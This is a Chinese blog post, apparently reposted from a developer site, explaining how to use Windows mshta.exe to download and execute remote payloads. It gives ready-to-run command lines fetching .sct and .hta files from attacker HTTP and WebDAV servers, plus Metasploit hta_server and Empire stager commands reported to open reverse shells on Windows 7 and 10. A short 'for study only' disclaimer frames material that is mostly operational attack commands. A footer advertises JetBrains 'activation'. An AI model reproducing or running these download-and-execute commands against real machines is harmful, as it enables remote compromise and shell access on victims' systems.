Windows文件传输及执行—mshta「建议收藏」

Windows文件传输及执行—mshta「建议收藏」Windows平台使用mshta下载文件并执行。

大家好,又见面了,我是你们的朋友全栈君。

声明:本文介绍的内容仅用于学习和研究目的,请勿用做非法用途。

 取决于Windows系统的版本,通过HTTP下载的文件缓存位置为IE的本地缓存,在下面的路径之一:

  • C:\Users\<username>\AppData\Local\Microsoft\Windows\Temporary Internet Files\
  • C:\Users\<username>\AppData\Local\Microsoft\Windows\INetCache\IE<subdir>

使用指向WebDav服务器的UNC路径下载的文件将保存在WebDAV客户端本地缓存:

  • C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV

 在使用UNC路径下载payload时,需要WebClient 服务启动,如果没有启动,可在命令行前面加上pushd \\webdavserver & popd命令。

Mshta下载&执行

mshta支持2种文件格式的执行,其中执行.sct文件的命令格式如下:

mshta vbscript:Close(Execute("GetObject(""script:https://webserver/payload.sct"")"))

其中,进行网络调用的进程为mshta.exe,本地缓存IE local cache。
执行.hta文件的命令格式如下:

mshta http://webserver/payload.hta

 metasploit的exploit/windows/misc/hta_server支持.hta文件的执行:
use exploit/windows/misc/hta_server
配置对应的参数后,在目标主机cmd下执行:
mshta http://192.168.49.160:8080/c3a4XKrdsu3L.hta
在win7和win10测试,都可成功反弹shell:
在这里插入图片描述
 Empire也支持.hta的payload:

usestager windows/hta

然后在目标主机执行:

mshta http://192.168.49.160:8000/payload.hta

win7,10成功:
在这里插入图片描述
使用UNC路径的命令格式为:

mshta \\webdavserver\folder\payload.hta

其中,进行网络调用的进程为svchost.exe,payload位置:WebDav本地缓存。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 举报,一经查实,本站将立刻删除。

发布者:全栈程序员-用户IM,转载请注明出处:https://javaforall.cn/159691.html原文链接:https://javaforall.cn

【正版授权,激活自己账号】: Jetbrains全家桶Ide使用,1年售后保障,每天仅需1毛

【官方授权 正版激活】: 官方授权 正版激活 支持Jetbrains家族下所有IDE 使用个人JB账号...

(0)


相关推荐

发表回复

您的电子邮箱地址不会被公开。

关注全栈程序员社区公众号